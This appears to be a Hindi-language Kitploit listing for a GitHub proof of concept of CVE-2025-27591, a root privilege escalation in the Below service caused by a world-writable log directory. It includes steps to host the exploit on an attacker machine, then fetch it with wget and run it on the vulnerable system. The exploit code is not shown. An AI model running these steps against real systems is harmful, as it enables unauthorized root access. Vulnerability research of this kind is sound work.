Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-27591-PoC — CVE-2025-27591 एक विशेषाधिकार वृद्धि भेद्यता है जो संस्करण 0.9.0 से पहले Below सेवा को प्रभावित करती थी। | Kitploit
उपकरण/GitHubGitHub/bridgeralderson/cve-2025-27591-poc
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubbridgeralderson/cve-2025-27591-poc

CVE-2025-27591-PoC

CVE-2025-27591 एक विशेषाधिकार वृद्धि भेद्यता है जो संस्करण 0.9.0 से पहले Below सेवा को प्रभावित करती थी।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
32211 साल पहलेKitploit द्वारा समीक्षित

CVE-2025-27591 प्रमाण-अवधारणा

CVE-2025-27591 एक विशेषाधिकार वृद्धि कमजोरी है जो संस्करण 0.9.0 से पहले Below सेवा को प्रभावित करती है। यह समस्या /var/log/below पर एक विश्व-लेखन योग्य निर्देशिका बनाने के कारण उत्पन्न हुई। एक हमलावर इस निर्देशिका के भीतर सिमलिंक्स में हेरफेर करके इस कमजोरी का शोषण कर सकता है और संभावित रूप से रूट विशेषाधिकार प्राप्त कर सकता है, जिससे यह स्थानीय गैर-विशेषाधिकार प्राप्त उपयोगकर्ताओं के लिए एक महत्वपूर्ण सुरक्षा चिंता बन जाती है।

यह प्रमाण-अवधारणा केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए लिखा गया था।

लेखन के समय, इस कमजोरी के लिए समुदाय में कोई सार्वजनिक रूप से उपलब्ध PoC मौजूद नहीं था। इसलिए, मैंने उस अंतर को भरने, सुरक्षा अनुसंधान पारिस्थितिकी तंत्र में योगदान देने और असुरक्षित फाइलसिस्टम की गंभीर प्रकृति के बारे में जागरूकता बढ़ाने के लिए इस कार्यान्वयन को जिम्मेदारीपूर्वक साझा करने का निर्णय लिया।

कमजोरी का कारण

image

प्रमाण-अवधारणा

हमलावर मशीन से:

1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git

2-cd CVE-2025-27591-PoC

3-python3 -m http.server 80

कमजोर सिस्टम से:

1- wget http:///exploit.py

2-python exploit.py

image

संदर्भ

https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3

टूल डाउनलोड करें